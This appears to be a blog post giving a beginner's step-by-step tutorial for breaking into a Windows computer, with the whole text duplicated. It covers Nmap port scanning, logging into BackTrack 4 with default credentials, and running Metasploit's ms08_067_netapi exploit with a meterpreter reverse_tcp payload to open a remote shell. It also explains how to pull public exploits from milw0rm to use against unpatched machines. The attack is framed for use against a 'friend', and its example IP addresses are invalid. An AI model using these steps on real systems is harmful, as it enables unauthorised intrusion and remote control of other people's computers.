Hack A System using Windows:
–
Finding Your Target: (IP)
__
Test this on a friends computer so you can understand
how it works.
Your Friend: Clicks START MENU then RUN then types
ipconfig.
If this does not work, they can also do this by clicking
the START MENU, then PROGRAMS then ACCESSORIES then
clicking COMMAND PROMPT. Type ipconfig and press enter.
Where it says “Ipv4 Address” there are four sets of
numbers. This is your friends IP ADDRESS.
Write it down, and keep it for later in this tutorial.
Or you can brouse this furum on other ways to get an ip
For exaple: IPget (MSN Plugin)
Scanning for an Open Port
__
Download and Install Nmap:
First, you will need to download Nmap.
Nmap is FREE and available here: http://www.insecure.org
Get the correct version for your operating system.
(Latest Stable Release, Self-Installer)
–
Run Zenmap
(The GUI *non black and white screen* version)
In the “Target” field, type your friend’s IP ADDRESS.
Once it is entered, click SCAN.
Allow the scan to complete, and save the information
Nmap found about your friend’s open ports for later
on in the tutorial.
Explanation
__
Your computer and your friends computer had a convorsation:
Your Computer Said: Can I Come In?
Your Friends Computer Replied: Maybe.
Your Computer Said: Where’s your front door?
Your Friends Computer Replied: Here’s a map of my doors,
windows, and chimney.
Now you are taking this map, and finding out how to open
his doors, windows, and chimney.
–
Downloading Hack Tools:
__
In this part, you will need two items.
VMWare Player (Program)
http://downloads.vmware.com/d/info/deskt…player/3_0
Scroll Down to “Product Downloads” then “Product” then click “VMWare Player 3.0.1″
Find the one for your operating system. Download.. and Install.
Linux Backtrack 4 Vmware Image (OS)
Download Link: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent
Linux Backtrack 4 can be downloaded with uTorrent (http://www.utorrent.com)
When Linux Backtrack 4 is done downloading, open it.
(If it won’t open, try downloading and installing WinRAR first)
*WinRAR is found at http://www.rarsoft.com*
You will select BT4-Beta, click EXTRACT, and put them in your VMWare
Folder called “Virtual Machines.”
Setting Up Tools:
__
Open VMWare Player, and click “OPEN.”
Find your “Virtual Machines” Folder, and go into BT4-Beta.
Double Click BT4-Beta.vmx
Allow it to Boot up (load files).
When it says “bt login” type root (then press enter)
When it says “password” type toor (then press enter)
It will say “root@bt:~#” type startx (then press enter)
To EXIT, click the “Computer Monitor Icon” at the bottom left corner,
and type poweroff (then press enter)
Explanation:
__
At this point, you have access to many hacking tools.
The Linux Backtrack OS has TONS of tools to use.
If you want to learn about them, just visit their forum
at remote-exploit.org
–
In Backtrack:
__
Click the “Computer Monitor Icon” at the bottom left corner.
In the box, type /etc/init.d/networking start (then press enter)
This allows Backtrack Networking. You need it “on” to hack.
When it is done loading, type ifconfig (then press enter)
If you have an IP address where it says “inet addr” then it
is worked. If not, check out their forum to troubleshoot.
Metasploit Attack Method:
__
In the “Computer Monitor Icon Box” you opened, type
cd /pentest/exploits/framework3 (then press enter)
*If it is a different version of Metasploit, you might use a different command*
*If so, visit the remote-exploit.org forum and look around*
Type ls (then press enter)
Type ./msfconsole (then press enter)
You will see a “metasploit logo” and where it used to say “root@bt:”
now says “msf >”
Type show exploits (then press enter)
This is a list of all of the different attacks you can use with Metasploit.
–
Exploit meets Vulnerability
__
Do you remember when your friends computer told you how to get inside? (The Nmap
report) Get your map and look at it closely.
You want to match the name of “one way in” to something
listed on the “different attack list” that Metasploit gave you.
Suppose you see “ms08_067_netapi” on both, then this is what you want to use.
(We are using ms08_067_netapi as an example)
Type: use (copy and paste exploit name)
So it will look like this: use windows/smb/ms08_067_netapi (then press enter)
Now type show options (then press enter)
Type set RHOST (Friends IP Address)
If your friends IP Address is 44.44.444.444, it will look like this
set RHOST 44.44.444.444 (then press enter)
Type set payload windows/meterpreter/reverse_tcp (press enter)
*Payloads are “what happens when their computer is exploited”
*There are other things you can choose from, but learn about those later on.
Type show options (then press enter)
Now, you will find your own IP Address. (Do this by clicking your START MENU, and
choosing PROGRAMS, ACCESSORIES, then COMMAND PROMPT) in the box type ipconfig
(then press enter)
As an example, we will say your IP Address is 55.55.555.555
Type set LHOST 55.55.555.555
Ready? Set? Type exploit (then press enter)
As an example, we used 44.44.444.444 for your friends IP Address, and
55.55.555.555 as your IP Address. So, if it says
“Meterpreter Session 1 opened (44.44.444.444 -> 55.55.555.555)” you
succeeded.
–
NEW Exploits and Attacks:
__
Hackers around the world find new ways to “get inside” computers every single day.
Metasploit has lots of attacks, but how can you use a NEW exploit?
The NEWEST exploits can be found two ways.
#1. You know how to take a REAL program (like Mozilla Firefox, etc) and find weaknesses in it.
You find an exploit that has not been discovered yet.
#2. Your best friend finds one and lets you have it (incredibly unlikely)
If you do not have either of these resources, you must depend on “public” exploits.
Some hackers search for weaknesses in programs and report them right away to websites.
Let’s say “Hacker” found a weakness in Firefox. Mozilla will make a “fix” for it, but
the people that have not updated Firefox with the “fix” are still vulnerable.
Beginners usually watch websites like http://www.milw0rm.com (and others) for these “NEW” exploits,
and try to test them against computers that have not been updated yet to gain access.
The question is.. how can you take a vulnerability from a public exploit website like milw0rm.com
and use it with Metasploit?
On the website (milw0rm.com) you will see a “D” column next to every exploit. This allows you to
DOWNLOAD the exploit. Once you have it, you will need to learn a small bit of programming to change
it to an .rb
__
Adding An Exploit File (.rb) to Metasploit:
__
Follow instructions above to start Linux Backtrack 4. Click the “Computer Monitor Icon” at the
bottom left of your screen. In the window, type cd /pentest/exploits/framework3 (then press enter)
Type ls (then press enter)
Type cd lib (then press enter)
Type cd msf (then press enter)
Type cd core (then press enter)
Type cd exploit (then press enter)
Type ls (then press enter)
At this point, we are going to use the “mv” command to move fileformat.rb
Try using mv /home/root/Desktop/fileformat.rb /home/root/pentest/framework3/lib/msf/core/exploit/
(then press enter)
*Might be a different directory, refer to remote-exploit.org forum if it does not work*
There will be a list of files after you press ENTER. Make sure fileformat.rb is there.
Type clear (then press enter)
Type cd .. (then press enter)
At this point, we are going to edit “exploit.rb”
Type nano exploit.rb (then press enter) then hold the DOWN arrow key to the area where it says
# Networks.
Hit the DOWN key a couple more times until you are below all of the “require” lines. Press ENTER.
Type # Fileformat (so it is even with #Networks)
Under it, type require ‘msf/core/exploit/fileformat’ and SAVE IT.
Now we have to move all of the new exploits (in .rb format) into “modules”
Go back to where Metasploit was being used “Computer Monitor Icon”
Type cd ../../../ (then press enter)
Type cd modules (then press enter)
Type ls (then press enter)
Type cd exploits (then press enter)
cd windows (then press enter)
Type mkdir fileformat (then press enter)
Type cd fileformat (then press enter)
Now we’re going to use the GUI (the non-black and white box way)
Open the equivelant of Windows’ “My Computer”
Double click: PENTEST then FRAMEWORK3 then MODULES then EXPLOITS then WINDOWS then FILEFORMAT
Drag all of your .rb format exploits into the folder.
__
Exploit File (.rb) TEST:
__
Go back to Metasploit, and type sudo rm -rf .msf3 (then press enter)
Now close it.
Open the “Computer Monitor Icon” at the bottom left of your screen, and get back into Metasploit.
You should have a higher number of exploits!
Enjoy!
–
Finding Your Target: (IP)
__
Test this on a friends computer so you can understand
how it works.
Your Friend: Clicks START MENU then RUN then types
ipconfig.
If this does not work, they can also do this by clicking
the START MENU, then PROGRAMS then ACCESSORIES then
clicking COMMAND PROMPT. Type ipconfig and press enter.
Where it says “Ipv4 Address” there are four sets of
numbers. This is your friends IP ADDRESS.
Write it down, and keep it for later in this tutorial.
Or you can brouse this furum on other ways to get an ip
For exaple: IPget (MSN Plugin)
Scanning for an Open Port
__
Download and Install Nmap:
First, you will need to download Nmap.
Nmap is FREE and available here: http://www.insecure.org
Get the correct version for your operating system.
(Latest Stable Release, Self-Installer)
–
Run Zenmap
(The GUI *non black and white screen* version)
In the “Target” field, type your friend’s IP ADDRESS.
Once it is entered, click SCAN.
Allow the scan to complete, and save the information
Nmap found about your friend’s open ports for later
on in the tutorial.
Explanation
__
Your computer and your friends computer had a convorsation:
Your Computer Said: Can I Come In?
Your Friends Computer Replied: Maybe.
Your Computer Said: Where’s your front door?
Your Friends Computer Replied: Here’s a map of my doors,
windows, and chimney.
Now you are taking this map, and finding out how to open
his doors, windows, and chimney.
–
Downloading Hack Tools:
__
In this part, you will need two items.
VMWare Player (Program)
http://downloads.vmware.com/d/info/deskt…player/3_0
Scroll Down to “Product Downloads” then “Product” then click “VMWare Player 3.0.1″
Find the one for your operating system. Download.. and Install.
Linux Backtrack 4 Vmware Image (OS)
Download Link: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent
Linux Backtrack 4 can be downloaded with uTorrent (http://www.utorrent.com)
When Linux Backtrack 4 is done downloading, open it.
(If it won’t open, try downloading and installing WinRAR first)
*WinRAR is found at http://www.rarsoft.com*
You will select BT4-Beta, click EXTRACT, and put them in your VMWare
Folder called “Virtual Machines.”
Setting Up Tools:
__
Open VMWare Player, and click “OPEN.”
Find your “Virtual Machines” Folder, and go into BT4-Beta.
Double Click BT4-Beta.vmx
Allow it to Boot up (load files).
When it says “bt login” type root (then press enter)
When it says “password” type toor (then press enter)
It will say “root@bt:~#” type startx (then press enter)
To EXIT, click the “Computer Monitor Icon” at the bottom left corner,
and type poweroff (then press enter)
Explanation:
__
At this point, you have access to many hacking tools.
The Linux Backtrack OS has TONS of tools to use.
If you want to learn about them, just visit their forum
at remote-exploit.org
–
In Backtrack:
__
Click the “Computer Monitor Icon” at the bottom left corner.
In the box, type /etc/init.d/networking start (then press enter)
This allows Backtrack Networking. You need it “on” to hack.
When it is done loading, type ifconfig (then press enter)
If you have an IP address where it says “inet addr” then it
is worked. If not, check out their forum to troubleshoot.
Metasploit Attack Method:
__
In the “Computer Monitor Icon Box” you opened, type
cd /pentest/exploits/framework3 (then press enter)
*If it is a different version of Metasploit, you might use a different command*
*If so, visit the remote-exploit.org forum and look around*
Type ls (then press enter)
Type ./msfconsole (then press enter)
You will see a “metasploit logo” and where it used to say “root@bt:”
now says “msf >”
Type show exploits (then press enter)
This is a list of all of the different attacks you can use with Metasploit.
–
Exploit meets Vulnerability
__
Do you remember when your friends computer told you how to get inside? (The Nmap
report) Get your map and look at it closely.
You want to match the name of “one way in” to something
listed on the “different attack list” that Metasploit gave you.
Suppose you see “ms08_067_netapi” on both, then this is what you want to use.
(We are using ms08_067_netapi as an example)
Type: use (copy and paste exploit name)
So it will look like this: use windows/smb/ms08_067_netapi (then press enter)
Now type show options (then press enter)
Type set RHOST (Friends IP Address)
If your friends IP Address is 44.44.444.444, it will look like this
set RHOST 44.44.444.444 (then press enter)
Type set payload windows/meterpreter/reverse_tcp (press enter)
*Payloads are “what happens when their computer is exploited”
*There are other things you can choose from, but learn about those later on.
Type show options (then press enter)
Now, you will find your own IP Address. (Do this by clicking your START MENU, and
choosing PROGRAMS, ACCESSORIES, then COMMAND PROMPT) in the box type ipconfig
(then press enter)
As an example, we will say your IP Address is 55.55.555.555
Type set LHOST 55.55.555.555
Ready? Set? Type exploit (then press enter)
As an example, we used 44.44.444.444 for your friends IP Address, and
55.55.555.555 as your IP Address. So, if it says
“Meterpreter Session 1 opened (44.44.444.444 -> 55.55.555.555)” you
succeeded.
–
NEW Exploits and Attacks:
__
Hackers around the world find new ways to “get inside” computers every single day.
Metasploit has lots of attacks, but how can you use a NEW exploit?
The NEWEST exploits can be found two ways.
#1. You know how to take a REAL program (like Mozilla Firefox, etc) and find weaknesses in it.
You find an exploit that has not been discovered yet.
#2. Your best friend finds one and lets you have it (incredibly unlikely)
If you do not have either of these resources, you must depend on “public” exploits.
Some hackers search for weaknesses in programs and report them right away to websites.
Let’s say “Hacker” found a weakness in Firefox. Mozilla will make a “fix” for it, but
the people that have not updated Firefox with the “fix” are still vulnerable.
Beginners usually watch websites like http://www.milw0rm.com (and others) for these “NEW” exploits,
and try to test them against computers that have not been updated yet to gain access.
The question is.. how can you take a vulnerability from a public exploit website like milw0rm.com
and use it with Metasploit?
On the website (milw0rm.com) you will see a “D” column next to every exploit. This allows you to
DOWNLOAD the exploit. Once you have it, you will need to learn a small bit of programming to change
it to an .rb
__
Adding An Exploit File (.rb) to Metasploit:
__
Follow instructions above to start Linux Backtrack 4. Click the “Computer Monitor Icon” at the
bottom left of your screen. In the window, type cd /pentest/exploits/framework3 (then press enter)
Type ls (then press enter)
Type cd lib (then press enter)
Type cd msf (then press enter)
Type cd core (then press enter)
Type cd exploit (then press enter)
Type ls (then press enter)
At this point, we are going to use the “mv” command to move fileformat.rb
Try using mv /home/root/Desktop/fileformat.rb /home/root/pentest/framework3/lib/msf/core/exploit/
(then press enter)
*Might be a different directory, refer to remote-exploit.org forum if it does not work*
There will be a list of files after you press ENTER. Make sure fileformat.rb is there.
Type clear (then press enter)
Type cd .. (then press enter)
At this point, we are going to edit “exploit.rb”
Type nano exploit.rb (then press enter) then hold the DOWN arrow key to the area where it says
# Networks.
Hit the DOWN key a couple more times until you are below all of the “require” lines. Press ENTER.
Type # Fileformat (so it is even with #Networks)
Under it, type require ‘msf/core/exploit/fileformat’ and SAVE IT.
Now we have to move all of the new exploits (in .rb format) into “modules”
Go back to where Metasploit was being used “Computer Monitor Icon”
Type cd ../../../ (then press enter)
Type cd modules (then press enter)
Type ls (then press enter)
Type cd exploits (then press enter)
cd windows (then press enter)
Type mkdir fileformat (then press enter)
Type cd fileformat (then press enter)
Now we’re going to use the GUI (the non-black and white box way)
Open the equivelant of Windows’ “My Computer”
Double click: PENTEST then FRAMEWORK3 then MODULES then EXPLOITS then WINDOWS then FILEFORMAT
Drag all of your .rb format exploits into the folder.
__
Exploit File (.rb) TEST:
__
Go back to Metasploit, and type sudo rm -rf .msf3 (then press enter)
Now close it.
Open the “Computer Monitor Icon” at the bottom left of your screen, and get back into Metasploit.
You should have a higher number of exploits!
Enjoy!
0 comments:
Post a Comment